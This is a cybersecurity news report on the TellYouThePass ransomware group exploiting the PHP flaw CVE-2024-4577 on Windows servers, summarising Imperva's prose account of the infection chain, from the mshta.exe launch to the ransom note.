Fraud Management & Cybercrime , Governance & Risk Management , Patch Management
Ransomware Gang TellYouThePass Exploits PHP Vulnerability
Flaw Allows Unauthenticated Attackers to Execute Arbitrary CodeA ransomware operation with a history of exploiting widespread internet vulnerabilities lost little time in making use of a critical-severity vulnerability in Window installations of web-scripting language PHP.
See Also: Preparing for New Cybersecurity Reporting Requirements
Imperva Threat Research in a Monday report said TellYouThePass ransomware operators began exploiting the PHP bug, tracked as CVE-2024-4577, hours after researchers released a proof of concept script (see: Critical PHP Vulnerability Threatens Windows Servers).
The TellYouThePass ransomware group, active since 2019, sees opportunity in cyber incidents that have system administrators globally scrambling to patch systems. It was among the cybercriminal groups to jump on the 2021 vulnerability known as Log4Shell. Security researchers say it has a history of appearing in new forms. Chinese network security firm Sangfor spotted it in March.
Imperva researchers said Monday they observed multiple hacking attempts against Windows PHP systems involving web shell uploads and efforts to deploy ransomware.
Attackers use the PHP flaw to execute arbitrary PP code by using the PHP system
function to run an HTML application file hosted on a hacker-controlled web server. The attackers use mshta.exe
to launch the attack - mshta.exe
is a "native Windows binary that can execute remote payloads, pointing to the attackers operating in a 'living off the land' style," said Imperva researchers.
The initial infection involves an HTML application named dd3.hta
that contains a malicious VBScript. This VBScript includes a base64 encoded string that, when decoded, reveals bytes of a binary loaded into memory during runtime.
The extracted bytes reveal a serialized method, which loads a Portable Executable file into memory during runtime - a .NET
variant of the TellYouThePass ransomware. Once executed, the file sends an HTTP request to the command-and-control server, which contains details about the infected machine. The callback masquerades as a request to retrieve CSS resources, likely to evade detection.
The command-and-control IP was hard-coded in the sample Imperva studied. The malware concludes by publishing a ReadMe message in the web root directory, which provides details necessary for a ransom payment.